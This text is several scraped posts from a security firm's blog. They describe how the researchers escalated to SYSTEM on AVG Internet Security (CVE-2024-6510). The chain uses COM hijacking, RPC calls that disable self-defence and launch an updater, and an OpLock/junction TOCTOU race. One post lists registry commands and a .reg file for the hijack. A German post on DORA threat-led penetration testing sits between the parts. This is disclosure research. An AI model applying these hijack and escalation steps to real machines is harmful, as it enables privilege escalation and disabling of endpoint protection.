Figure 2: Schematic ACLs on specific folders in SYSTEM32

With this DLL injection method established, the next step was to analyze the communication with backend processes. In the following section, we will discuss how we leveraged this primitive to manipulate the trust relationship and escalate privileges.

Reverse engineering the RPC communication

Reverse Engineering RPC communication can be a daunting task, especially in the beginning. Fortunately, tools like RpcView are invaluable for enumerating and identifying RPC interfaces. However, the process ultimately requires in-depth reverse engineering efforts. For our work with AVG, we used the excellent Akamai Research RPC Toolkit to identify and analyze various RPC interfaces across the different AVG binaries.

Our focus was on RPC server interfaces, as these are the endpoints exposed by high-privileged processes. While the AVGSvc.exe executable does not contain RPC server bindings, we found that the ashServ.dll DLL, which is loaded by the service, does expose such interfaces!

The Akamai RPC Toolkit produced the following output: 

"ashServ.dll": {
// [...]
"908d4c23-138f-4ac5-af4a-08584ae7c67b": {
"number_of_functions": 22,
"functions_pointers": [
"0x1654e0700",
"0x1654e0790",
// [...]
],
"role": "server",
"flags": "0x6000000",
"interface_address": "0x165f96020",
// [...]
"eb915940-6276-11d2-b8e7-006097c59f07": {
"number_of_functions": 106,
"functions_pointers": [
"0x1655c8180",
"0x1655c8290",
// [...]
"role": "server",
"flags": "0x6000000",
"interface_address": "0x165fca670"
},
"1118fbbd-02ee-4910-9d86-9940537ee146": {
"number_of_functions": 23,
"functions_pointers": [
"0x1655c08d0",
"0x1655c6be0",
// [...]
],
"role": "server",
"flags": "0x6000000",
"interface_address": "0x165fccfb0"
}

From this output, we can observe three major interfaces with 22, 106, and 23 exposed endpoints. The largest interface is the [Aavm] RPC interface, which has been the subject of previous research and exploitation. Searching the interface GUID on the web reveals some other interesting blog posts back in the year 2015.

Reverse engineering and renaming the functions within the RPC interface is tedious but relatively straightforward.

Figure 3: Some renamed RPC functions of the Aavm RPC interface

Through this analysis, we discovered an RPC function named AavmRpcRunSystemComponent that uses the CreateProcess API without RPC impersonation:

.rdata:0000000165FCA550 dq offset sub_1655C5580
.rdata:0000000165FCA558 dq offset sub_1655C55D0
.rdata:0000000165FCA560 dq offset AavmRpcRunSystemComponent
.rdata:0000000165FCA568 dq offset DecryptData
.rdata:0000000165FCA570 dq offset AddNetAlert

When the RPC client is not impersonated, any new process spawned through this function will run with SYSTEM privileges, creating a critical opportunity for privilege escalation. However, before this process is initiated, a DSA_FileVerify check takes place:

__int64 __fastcall AavmRpcRunSystemComponent(__int64 a1, unsigned int whitelist_id, __int64 arguments, DWORD *out_pid)
{
// [...]
char out_string[32];
// [...]
v8 = GetFileById(out_string, whitelist_id); // [1]
// [...]
FileW = CreateFileW((LPCWSTR)out_string, 0x80000000, 1u, 0i64, 3u, 0x8000000u, 0i64);
v12 = FileW;
v21 = (__int64)FileW;
if ( FileW == (HANDLE)-1i64 )
{
// file not found
}
if ( !GetFinalPathNameByHandleW(FileW, szFilePath, 0x104u, 0) )
{
// File path could not be resolved
}
if ( whitelist_id != 2 && !(unsigned __int8)DSA_FileVerify(szFilePath, 0i64, 18i64) ) // [2]
{
LastError = 87; // ERROR_INVALID_PARAMETER
CloseHandle(v12);
return LastError;
}
// [...]
snprintf(combined_arguments, v15, L"%s %s", szFilePath, arguments); // [3]
// [...]
if ( CreateProcessW(szFilePath, combined_arguments, 0i64, 0i64, 0, 0, 0i64, 0i64, &StartupInfo, &ProcessInformation) ) // [4]
{
// Win ?

The DSA_FileVerify function performs several validations:

  1. Based on the integer argument in [1], it returns a filename. Most of the executable files in this list are repair or setup tools, such as aswOfferTool.exe, SupportTool.exe and AvEmUpdate.exe, which limits the options to those predefined binaries.
  2. A file signature verification is performed in [2] to ensure only trusted binaries can be executed. This check prevents an attacker from inserting their own malicious binary into the process.
  3.  Finally, the program arguments are constructed in [3], and the process is created with SYSTEM privileges in [4].

Although this function appears to be a promising privilege escalation vector, the constraints of the allow-listed binaries and file signature verification present significant roadblocks. Without the ability to exploit any of the allow-listed programs, this avenue may seem like a dead end.

To overcome this limitation, we decided to experiment with the RPC client bindings found in the aavmrpch.dll library. Using this approach, we began testing the functionality of various RPC interfaces, with particular emphasis on the AavmRpcRunSystemComponent function, to explore potential exploitation paths.

Abusing the update mechanism

The most promising target for exploitation was the AvEmUpdate.exe executable, which accepts a range of command-line arguments. This executable is responsible for installing updates provided as cab or DLL files. Since we could control the arguments passed to it, this presented a compelling opportunity for further exploration.

One particularly interesting argument was /applydll, which allows the process to load a specified DLL. Crucially, because the process runs with SYSTEM privileges, this argument could potentially be abused to escalate privileges. However, the update mechanism includes an additional safeguard: it verifies that the provided DLL is signed by the manufacturer. This signature check prevented us from directly supplying a custom DLL to gain SYSTEM privileges.

TOCTOU race

Despite this limitation, we were confident that we could bypass the integrity check by carefully analyzing and exploiting the logic of the process. We finally found a time of use vs time of check (TOCTOU) issue in the logic, which made the integrity checks bypassable. To exploit this reliably, we employed a combination of OpLocks (opportunistic locks) and junctions.

To control the timing of the file accesses during exploitation and exploit our race reliably we needed a way to put the update process in a waiting state. Here we used OpLock to block access to the DLL file and force the update process to wait for us releasing the OpLock. This works even on processes running as SYSTEM, while operating as an unprivileged user. This gives us time to prepare for the next step.

We also want to be able to switch out the DLL file while holding our OpLock. This is where junctions come in. Junctions are symbolic links that can redirect file system access to a different location. Since an unprivileged user can create junctions, we used this capability to redirect file accesses during the exploitation process while holding our OpLock. We can point the junction to an other location for the next file access and there precisely control which file is accessed for each single file access. For more information on OpLocks and junctions, refer to the code provided by James Forshaw and this article from ZDI.

Here’s how the exploit worked:

  1. The AvEmUpdate.exe process made multiple file accesses before loading the DLL, likely to verify its legitimacy.
  2. Using a junction, we redirected the process to a valid, signed DLL for the first three file access attempts.
  3.  On the fourth file access, when the process attempted to load the DLL, we redirected the junction to our malicious DLL containing the privilege escalation payload.

Because we were holding an OpLock on the initial three file accesses, we could dynamically change the target of the junction while the SYSTEM process was waiting for access to the previous file. After updating the junction’s target, we released the OpLock, allowing the process to move on to the next file. We repeated this until the fourth access successfully loaded our malicious DLL.

Figure 4: Visualization of the junction redirects

Note that the process always accesses the same file; however, using the junction, we change the files accessible under this path.

While this technique successfully allowed us to bypass the signature verification and load our malicious DLL, it wasn’t sufficient on its own to fully escalate privileges. In the next section, we will delve into the additional steps required to achieve high privileges on the system and the challenges we encountered along the way.

Disabling self-defence

Even after successfully executing the TOCTOU (time-of-check-to-time-of-use) race, our malicious DLL was not loaded into the process. Upon further investigation, we discovered that the process only loaded DLLs with valid signatures. This added layer of protection significantly complicated our exploitation attempts. We suspect this behavior was due to the process being launched as a PPL (Protected Process Light) process.

After some trial and error, we found that this restriction was enforced only when the product’s self-protection feature was enabled. Fortunately, we identified an RPC function, AavmRpcDisableSelfDefense, that could disable this self-protection mechanism. This function was exported by the same DLL (ashServ.dll) we had already interacted with in our previous RPC calls. By calling this function, we successfully disabled the product’s self-defense feature.

With self-defense disabled, our malicious DLL was successfully loaded into the process running with SYSTEM privileges, finally completing the privilege escalation.

To summarize, the exploitation in this case worked as follows:

1. Initial entry with COM hijacking:

  • We used COM hijacking to load a DLL into the frontend process.
  • To bypass the allow-listing mechanism, the DLL was placed in C:\Windows\System32\spool\drivers\color

2. Disabling self-defense:

  •  The loaded DLL then called the function AavmRpcDisableSelfDefense to deactivate the product’s self-protection feature.

3. Triggering the update mechanism:

  •  The DLL triggered an update by calling AavmRpcRunSystemComponent.
  • Using a junction in combination with OpLocks, we tricked the update process into loading an unsigned DLL.
  • This allowed us to escalate our privileges to SYSTEM.

Summary

In this blog post, we demonstrated how COM hijacking was leveraged to gain SYSTEM privileges for exploiting AVG Internet Security to gain privileges. Unlike the previous case, we encountered additional obstacles, namely an allow-listing mechanism, that initially blocked our DLL. We described how we bypassed this restriction by placing the DLL in a writable system directory. We detailed our reverse engineering of the product’s RPC calls, which uncovered functions that allowed us to disable self-protection and trigger the update mechanism. By combining a junction and OpLocks, we bypassed the signature check and successfully loaded an unsigned DLL, enabling us to escalate privileges to SYSTEM.

In the next post, we will explore two additional vulnerabilities related to COM hijacking and describe how we exploited them to achieve privilege escalation.

This article was written as part of joint research with Neodyme.

Further blog articles

Command-and-Control

Beacon Object Files for Mythic – Part 3

December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 2

November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 2

January 29, 2025 – In this post, we will delve into how we exploited trust in AVG Internet Security (CVE-2024-6510) to gain elevated privileges.
But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 1

January 15, 2025 – In this series of blog posts, we cover how we could exploit five reputable security products to gain SYSTEM privileges with COM hijacking. If you’ve never heard of this, no worries. We introduce all relevant background information, describe our approach to reverse engineering the products’ internals, and explain how we finally exploited the vulnerabilities. We hope to shed some light on this undervalued attack surface.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

TLPT: Bedroh­ungs­­­orientierte Penetra­tions­tests nach DORA

Search

TLPT: Bedroh­ungs­­­orientierte Penetra­tions­tests nach DORA

January 24, 2025

TLPT: Bedrohungs­orientierte Penetrations­tests nach DORA

This blog post is written in German as it is very specific to the implementation of DORA and TLPT in Germany. A summary is provided in English.

Summary

Since January 17, 2025, the Digital Operational Resilience Act (DORA) has been put into practice. One important aspect of DORA is the requirement of regularly performing threat-led penetration tests (TLPT). Only selected entities within the financial sector are required to conduct TLPTs. Even though TLPTs sound like a new concept, they have actually existed in Germany since 2020 in form of TIBER tests. This blog post describes the concepts behind TLPTs and how they are conducted. Furthermore, alternatives for targeted and budget-oriented red team assessments are given.

Wen betreffen DORA und TLPT?

Am 17.01.2025 trat der Digital Operational Resilience Act (DORA) der Europäischen Union in Kraft. Die Verordnung hat das Ziel, die digitale operationale Resilienz im Finanzsektor sicherzustellen und zu stärken. Dadurch soll der europäische Finanzmarkt bestmöglich gegen Angriffe und Risiken in der IT‑ und Informationssicherheit geschützt werden. Nach Aussage der BaFin sind so gut wie alle beaufsichtigten Institute und Unternehmen im Finanzsektor regulatorisch betroffen (Quelle BaFin).

Ein wesentliches Instrument von DORA ist die Durchführung bedrohungsorientierter Penetrationstests, kurz TLPT. Diese Abkürzung leitet sich aus dem Englischen ab und steht für Threat-led Penetration Test. Während DORA nahezu alle Unternehmen im Finanzsektor betrifft, müssen längst nicht alle diese Unternehmen auch TLPTs durchführen. Ob ein Unternehmen zur Durchführung dieser erweiterten, bedrohungsorientierten Penetrationstests verpflichtet ist, entscheidet die zuständige Aufsichtsbehörde auf Basis der in DORA, Artikel 26 festgelegten Kriterien (siehe Verordnung der Europäischen Union) und informiert betroffene Unternehmen.

„Die BaFin wird diesen Identifikationsprozess Ende 2024/Anfang 2025 das erste Mal durchführen und dann regelmäßig wiederholen. Separat davon wird die BaFin in Abstimmung mit der Bundesbank die jeweiligen Institute und Unternehmen über den konkreten individuellen Testbeginn (Testanordnung) informieren.“, so die BaFin.

Neben potenziellen kritischen Auswirkungen auf systemrelevante Dienstleistungen des Unternehmens sowie den europäischen Finanzmarkt ist insbesondere auch der Reifegrad in der IT‑ und Informationssicherheit bei der Auswahl relevant.

Was versteckt sich hinter TLPT genau?

Regelmäßig führen meine Kollegen und ich Gespräche mit unseren Kunden aus dem Finanzsektor zum Thema TLPT. Die Kernfrage der Unternehmen ist dabei stets, was denn nun unter TLPT zu verstehen sei.

Im Grunde ist TLPT nichts Neues. Bereits seit 2020 begleitet die Deutsche Bundesbank die Durchführung von TIBER-DE-Projekten. TIBER-DE ist die Umsetzung von TIBER-EU für Deutschland. TIBER steht dabei für Threat Intelligence-based Ethical Red Teaming und stellt somit eine bedrohungsgetriebene Form eines Red-Team-Assessments dar.

Bei einem Red-Team-Assessment handelt es sich um einen ganzheitlichen Ansatz zur Überprüfung der IT‑ und Informationssicherheit. Dabei werden unterschiedliche Angriffsvektoren und ‑szenarien auf technischer, prozessualer und organisatorischer Ebene überprüft. Diese Überprüfung erfolgt durch die Simulation gezielter Angriffe mit aktuellen und relevanten Angriffstechniken.

Bei TIBER wird die Auswahl der Angriffsszenarien sowie der Taktiken, Techniken und Verfahren (aus dem Englischen Tactics, Techniques and Procedures – TTPs) durch unternehmensspezifische Threat Intelligence getrieben. Konkret bedeutet das, dass gezielt auf Basis der aktuellen Bedrohungslage des betroffenen Unternehmens Angreifergruppen mit ihren jeweiligen TTPs simuliert und so die Widerstandsfähigkeit des Unternehmens geprüft wird (siehe dazu Informationen der Deutschen Bundesbank). Dementsprechend stellt TIBER eine spezialisierte und bedrohungsorientierte Form von Red-Team-Assessments dar und steht als konkretes Rahmenwerk für die Projektdurchführung zur Verfügung (siehe Deutsche Bundesbank).

Ein TLPT im Rahmen von DORA baut laut der BaFin auf diesem Rahmenwerk auf und intensiviert die Zusammenarbeit zwischen der BaFin und der Deutschen Bundesbank (siehe dazu Informationen der BaFin). Gemäß der BaFin ändern sich lediglich „kleinere Details in der operativen Durchführung eines TLPT im Vergleich zu dem etablierten TIBER-DE Rahmenwerk“ (siehe Deutsche Bundesbank). Man kann also festhalten, dass ein TLPT im Wesentlichen ein TIBER-Test ist.

Wie bei TIBER-DE-Projekten ist auch bei TLPTs die Deutsche Bundesbank in die gesamte Projektdurchführung involviert. Sie unterstützt bei der Durchführung, überwacht deren Konformität und attestiert diese abschließend. Ohne eine Involvierung der Deutschen Bundesbank geht es also nicht.

Bereits aus dieser kompakten Beschreibung lässt sich erahnen, dass es sich bei einem TLPT nicht um einen alltäglichen Penetrationstest handelt. Die folgende Grafik der BaFin veranschaulicht dies:

Michael Brügge

Leitender Berater

Category
Date
Navigation
Abbildung 1: TLPTs als seltene, dafür spezialisierte Penetrationstests

Konkret fordert DORA die Durchführung eines TLPT in regelmäßigen Abständen von drei Jahren. Unternehmen, die in der Vergangenheit bereits freiwillig eine offizielle Überprüfung nach TIBER-DE durchgeführt haben, können sich diese entsprechend anrechnen lassen (siehe BaFin).

Wie läuft ein TLPT ab?

An der Durchführung eines TLPT sind unterschiedliche Akteure beteiligt. Diese Teams und ihre Rollen sind in der folgenden Grafik der BaFin dargestellt:

Abbildung 2: Involvierte Akteure eines TLPT

Da ein TLPT auf TIBER-DE aufsetzt, lässt sich der Ablauf eines TLPT-Projekts gut anhand von TIBER-DE erläutern. Grundsätzlich gliedert sich das Projekt in die folgenden drei Phasen:

  • Vorbereitungsphase
  • Testphase
  • Abschlussphase

Jede diese Phasen gliedert sich wiederum in mehrere Teilschritte und involviert verschiedene Akteure. Die folgende Grafik der BaFin skizziert den gesamten Ablauf eines TLPT:

Abbildung 3: Involvierte Akteure eines TLPT

Wie Abbildung 3 zu entnehmen ist, identifiziert die zuständige Finanzaufsicht betroffene Finanzunternehmen, legt die Testfrequenz fest und validiert den Testumfang. Anschließend sind die betroffenen Unternehmen dafür verantwortlich, die passenden Dienstleister für die Durchführung auszuwählen. Hier ist bewusst nicht nur von einem Dienstleister die Rede, da TIBER-DE eine strikte Trennung zwischen dem Threat-Intelligence-Provider und dem Red-Team-Provider vorsieht, das heißt die Sammlung von Informationen und die Durchführung des Red-Team-Assessments dürfen explizit nicht vom selben Personenkreis durchgeführt werden. Zwar ist es grundsätzlich möglich, hierfür nur einen Anbieter zu wählen, jedoch empfiehlt die Deutsche Bundesbank klar die Auswahl jeweils spezialisierter Dienstleister. Eine Liste attestierter TLPT- bzw. TIBER-Dienstleister gibt es für Deutschland übrigens bislang nicht (siehe BaFin). Unter bestimmten Voraussetzungen erlaubt DORA im Vergleich zu TIBER-DE die interne Durchführung (siehe Deutsche Bundesbank).

In der Testphase erfolgen anschließend zunächst die Sammlung von Informationen und die Ableitung bedrohungsorientierter Angriffsszenarien. Zu diesem Zweck wird sowohl die allgemeine Bedrohungslage für den Finanzsektor als auch unternehmensspezifische Bedrohungen betrachtet. Stellt sich dabei beispielsweise heraus, dass ein bestimmter Threat Actor derzeit verstärkt deutsche Finanzinstitute angreift und dazu Malware über Vishing-Angriffe verteilt, so spiegelt dies ein valides und bedrohungsorientiertes Szenario für den TLPT wider. Gemeinsam mit dem Unternehmen, dem Threat-Intelligence- und dem Red-Team-Provider sowie der Deutschen Bundesbank werden anschließend mehrere Szenarien ausgewählt und konkret definiert. Diese stellen die Ausgangslage für das Red-Team dar und legen die Taktiken, Techniken und Verfahren der simulierten Angreifer fest. Die gesamte Testphase erstreckt sich dabei auf ca. 18 Wochen, wobei auf die Durchführung der Angriffe ca. 12 Wochen entfallen.

Abschließend erfolgt die Berichtserstellung. Dabei ist wichtig zu beachten, dass nicht nur das Red-Team, sondern auch das Blue-Team des betroffenen Unternehmens seine Erkenntnisse entsprechend strukturiert niederschreibt. In anschließenden Replay- und Purple-Team-Workshops wird der gesamte Test noch einmal rekapituliert und es können mögliche „Was wäre, wenn“-Fragen geklärt werden. Diese Workshops sind erfahrungsgemäß für alle Beteiligten stets sehr aufschlussreich und liefern neben den Abschlussberichten tiefgreifende Erkenntnisse zu technischen, prozessualen und organisatorischen Defiziten. Zudem bietet ein derartiger Test eine gute Gelegenheit, die Erkennungs‑ und Reaktionsfähigkeiten des Blue-Teams zu testen und zu trainieren. Alle identifizierten Defizite werden abschließend in einem Behebungsplan adressiert und mit Verantwortlichkeiten versehen. Schlussendlich erfolgt die Attestierung der konformen Durchführung des TLPT durch die Deutsche Bundesbank und ca. 3 Jahre später beginnt das Ganze von vorn.

Sollten Sie zur Durchführung eines TLPT verpflichtet sein, sprechen Sie uns gern an. Als professioneller Anbieter für Red-Team-Assessments und Penetrationstests bieten wir auch die anforderungskonforme Durchführung von TLPTs und TIBER-Tests an. Weitere Informationen finden Sie unter https://cirosec.de/leistungen/red-team-assessments/.

Es muss nicht immer TLPT oder TIBER sein

Falls Ihr Unternehmen zur Durchführung eines TLPT verpflichtet ist, führt kein Weg an einer anforderungskonformen Umsetzung vorbei. In vielen Fällen sind Unternehmen des Finanzsektors jedoch gar nicht von der verpflichtenden Durchführung betroffen. Dann ist möglicherweise eine kompaktere Form eines Red-Team-Assessments sinnvoll.

Mit TIBER bzw. TLPT haben die BaFin und die Deutsche Bundesbank zwar ein wichtiges und konkretes Rahmenwerk für die Durchführung ganzheitlicher bedrohungsorientierter Penetrationstests geschaffen und durch die konkreten Vorgaben lassen sich die Projekte strukturiert und umfassend durchführen. Allerdings ist damit auch ein entsprechend hoher Aufwand verbunden, sowohl bei der notwendigen Anzahl von Personentagen für die externe Durchführung durch einen Threat-Intelligence- und Red-Team-Provider als auch für die notwendigen Eigenleistungen.

cirosec war in der Vergangenheit bereits maßgeblich in die Durchführung von TIBER-Tests involviert und hat daher nicht nur die notwendigen Skills als professioneller Red-Team-Anbieter, sondern kennt auch die damit verbundenen Aufwände. Insbesondere wenn ein Unternehmen nicht von der verpflichtenden Durchführung betroffen ist oder bislang noch keine Erfahrungen in der Durchführung klassischer Red-Team-Assessments gesammelt hat, kann ein kompakterer Ansatz hilfreich sein. Aus unzähligen Gesprächen mit unseren Kunden wissen wir, dass nicht jedes Unternehmen die Kapazitäten oder den notwendigen Reifegrad für ein derartiges Projekt hat. Es muss daher nicht immer TLPT oder TIBER sein.

Dennoch halten wir den Ansatz eines ganzheitlichen, bedrohungsorientierten Penetrationstests für enorm wichtig. Nur so lassen sich Zusammenhänge und übergreifende Risiken erkennen und anschließend adressieren. Als etablierter Anbieter für professionelle Red-Team-Assessments und Penetrationstests haben wir stets den Anspruch, unseren Kunden auf ihre konkreten Bedürfnisse abgestimmte Angebote zu unterbreiten. Aus diesem Grund gibt es bei cirosec nicht das eine Red-Team-Assessment. Stattdessen ermitteln wir gemeinsam mit unseren Kunden ein passendes Gesamtpaket, das die Motivation und die Projektziele des Kunden verfolgt, ins Budget passt und sich nach dem jeweiligen Reifegrad richtet. Insbesondere für Unternehmen, die in Zukunft potenziell von der verpflichtenden Durchführung von TLPTs betroffen sind, bieten kompaktere Formen eine gute Gelegenheit, erste Erfahrungen mit ganzheitlichen bedrohungsorientierten Penetrationstests zu sammeln.

Sprechen Sie uns daher gern an, wenn Sie einen kompetenten Partner für die Durchführung individueller Red-Team-Assessments oder eines standardisierten TLPT brauchen.

Further blog articles

Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

The Key to COMpromise – Part 1

Search

The Key to COMpromise – Part 1

January 15, 2025

The Key to COMpromise - Pwning AVs and EDRs by Hijacking COM Interfaces, Part 1

Introduction

Antivirus (AV) and Endpoint Detection and Response (EDR) products are critical in securing systems in enterprise environments or personal setups. These products are designed to protect devices, but their widespread use – particularly in enterprises – means vulnerabilities in these products can significantly impact overall security. We previously analyzed Wazuh and found vulnerabilities that would have allowed lateral movement in the organization’s network. In this series, we will discuss how we identified vulnerabilities in multiple security products that could, in theory, allow privilege escalation to SYSTEM on millions of devices, assuming initial access was gained. We will introduce the general design of the targeted security products to give you some background information on the mechanisms that allowed us to escalate our privileges.

Technical Background

All the security products we examined include a user interface, which typically allows users to perform actions such as triggering filesystem scans, initiating updates, or modifying settings like excluded files. For example, setting an exclusion should require high privileges to prevent malware from excluding itself from scans. However, the user interface usually operates in the context of the user executing it. Especially in an enterprise setting, this user often lacks high privileges, as granting such privileges would violate good security practices.

How does a low-privileged user change settings?

Since the user interface cannot directly perform privileged actions, such as setting exclusions, a separate system process with higher privileges is required to execute these changes on behalf of the user interface. In our analysis, we will refer to: * The user interface as the front-end process. * The highly privileged system process as the back-end process.

To coordinate actions, the front-end process must communicate with the back-end process. Depending on the product, this communication occurs through named pipes, Remote Procedure Calls (RPC), or Component Object Model (COM) interfaces. Across all products we examined, the back-end process ran with SYSTEM privileges.

Security risks in back-end communication

A natural concern arises: Could malware abuse this communication to perform privileged actions? If malicious software could directly interact with the back-end process, it could exploit this pathway to, for example, modify the registry or other sensitive settings.

To mitigate this, security products typically verify that actions initiated by the back-end process originate from a trusted source. For example, they might check the signature of the executable initiating communication.

However, this safeguard is insufficient on its own, as Windows lacks strict boundaries between processes running under the same user account. A process can read or write to the memory of other processes in the same user context. It can even execute code within those processes. As a result, malware could potentially hijack a trusted process to abuse its connection with the back-end process.

Protections against code injection

To address this risk, security vendors implement additional protections to secure the front-end process:

  • Filter Drivers: These intercept system calls and prevent handles with privileges that could allow code injection from being created for the front-end process. This measure blocks many common code injection techniques, often relying on acquiring such handles.
  • DLL Allowlist Validation: During our testing, we observed measures that verify the location of loaded DLLs against an allowlist to prevent loading of untrusted DLLs.

These defences significantly reduce the risk of untrusted code injection.

Communication between front-end and back-end processes

The diagram below illustrates the components involved in the communication between front-end and back-end processes:

Figure 1: Overview of the components involved in typical communication between different processes of an EDR
Alain Rödel and Kolja Grassmann

Consultants

Category
Date
Navigation

Communication with the back-end process remains an attractive attack surface. For example, attackers could exploit it to trigger privileged actions, such as modifying the registry, from an unprivileged context. Manufacturers are aware of these risks and have implemented safeguards to prevent direct communication with the back-end process. However, previously discovered vulnerabilities, such as those in Avast [1,2], have demonstrated that bypassing these protections is possible.

Exploiting back-end communication

To abuse back-end communication, an attacker must first establish a way to interact with the back-end process. There are two primary approaches:

  • Exploit validation logic flaws: Identify weaknesses in the logic used by the back-end process to verify that requests originate from the front-end process.
  • Inject code into the front-end process: Attackers can indirectly communicate with the back-end process by executing code within the trusted front-end process.

In our research, we pursued the second approach. Using COM hijacking, we successfully injected code into the front-end process, enabling us to communicate with the back-end process from within the trusted front-end.

COM hijacking

Component Object Model (COM) interfaces provide additional functionality to applications, offering a framework for interprocess communication and object reuse. For instance, Windows Runtime (WinRT) is implemented based on COM. A key advantage of COM is its abstraction: developers using COM interfaces do not need to understand the underlying implementation, which could be written in another language, executed in a separate process, or even reside on a remote server in the case of Distributed COM (DCOM).

Some COM interfaces implement their functionality through DLLs that are dynamically loaded into the calling process when the interface is invoked. Hijacking such a COM interface allows injecting a custom DLL into the calling process, enabling code execution within the process’s context.

To use a COM interface the developer invokes the CoCreateInstance with a GUID, which then leads to a search of the right COM interface and returns a COM object if the interface is found. The following graphic gives a high level overview of how this could work for the TaskScheduler interface:

Figure 2: Example COM lookup of the ITaskScheduler COM object

The core idea of COM hijacking is to exploit the registry’s search order for COM interface definitions. When a COM interface is accessed, the system first looks for its definition in the HKEY_CURRENT_USER (HKCU) registry hive before checking the HKEY_LOCAL_MACHINE (HKLM) hive. If the COM interface uses a DLL to provide its functionality, the registry entry will include the path to the implementing DLL. Since the HKCU hive belongs to the current user, it can be modified by processes running with that user’s privileges. This means that any process running in the user’s context — including the front-end process of an EDR product running in the context of our unprivileged user — will prioritize COM definitions in the HKCU hive and stop searching once a match is found. The following diagram shows the registry accesses before and after a COM hijack:

Figure 3: Overview of the involved components

COM hijacking is most often discussed as a persistence technique. For instance, attackers could hijack a COM interface known to be invoked, ensuring their payload is executed. In our research, however, we employed COM hijacking differently. Rather than using it solely for persistence, we specifically targeted the front-end process of EDR products to load a custom DLL. This allowed us to execute code within the process context, leveraging the elevated privileges of the back-end process during communication. Interestingly, this approach proved effective against many EDR products. There was similar research in the past, which abused COM hijacking to bypass the self defense of similar products [5]. Futhermore James Forshaw previously demonstrated its use against VirtualBox [3].

In all the EDR products we examined, COM interfaces were used in the front-end process. Most of these interfaces were located under the HKLM hive, so there was no need to overwrite any data. However, overwriting an interface in the HKCU hive would also have been possible.

After hijacking a COM interface, every invocation of the targeted interface in the user’s context would trigger our hijacked COM interface. For our purposes, this enabled us to load our custom DLL into the front-end process whenever specific actions were performed, such as opening a file dialogue in the user interface.

Now that we have discussed COM-hijacking in theory, the next question is how we identified COM interfaces of interest within the front-end process.

Identifying a hijackable COM interface

The initial step in all the vulnerabilities we discovered involved achieving code execution in a front-end process via COM hijacking. As this was similar across all the products we analyzed, we will outline the general process here instead of repeating it for each specific product.

We can see that each COM lookup is performed via a GUID that matches to an CLSID (Class ID). Now we can hunt for those GUIDs and figure out what COM objects are used by the product.

For each product, the first task was to identify a COM Interface used by the front-end process.

This required considering several factors:

  • When is the COM interface invoked?
    • During the start of the UI
    • When entering a specific menu
  • Is the COM interface used by other processes?
    • To avoid unintended consequences (e.g., disrupting explorer.exe), we ensured the interface was unique to the target process or could be safely used in parallel.

We used the Process Monitor from the SysInternals suit to identify relevant COM interfaces. We first identified the process we wanted to target. Then, we used a filter to view only events triggered by this process. Next, we created a filter for registry events where the path contained CLSID and InProcServer32, indicating that the process tries to load a DLL used for a COM interface.

The following screenshot demonstrates how explorer.exe queries the relevant registry keys, providing insight into the COM interfaces it accesses:

Figure 4: Accesses to COM interfaces by explorer.exe

After identifying a potential COM interface, the next step was to confirm if the front-end process loaded the referenced DLL. We monitored file interactions and filtered paths containing the DLL name to do this. If the DLL was loaded, it would trigger a load event for the DLL specified in the registry:

Figure 5: Loading a DLL related to COM

Once a suitable interface was identified, the next step was to hijack it.

Hijacking a COM interface

One registry key we targeted across multiple products was:

Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}

This COM interface loads the dataexchange.dll into the calling process.
To hijack the DLL, we first exported it:

reg export "HKLM\\SOFTWARE\\Classes\\CLSID\\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}" .\export.reg /reg:64

Then, we opened the exported file export.reg in a text editor and changed the paths to HKEY_CURRENT_USER. We also changed the file path to point to our custom DLL:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}]

[HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\\InProcServer32]
@="C:\\\\poc\\\\dataxchange.dll"
"ThreadingModel"="Both"

Next, we imported the modified registry export:

reg import .\export.reg /reg:64

With these modifications, all calls to this COM interface from the context of our unprivileged user would invoke our custom DLL. This might lead to problems with other processes, so we should remove the hijack when we are done with exploitation.

Our DLL must export the functions the original COM DLL would expose to ensure smooth operation. This can be achieved by proxying calls to the original DLL using a template such as:

#include <windows.h>
#include <combaseapi.h>

#pragma comment( linker, "/export:DllGetClassObject" )

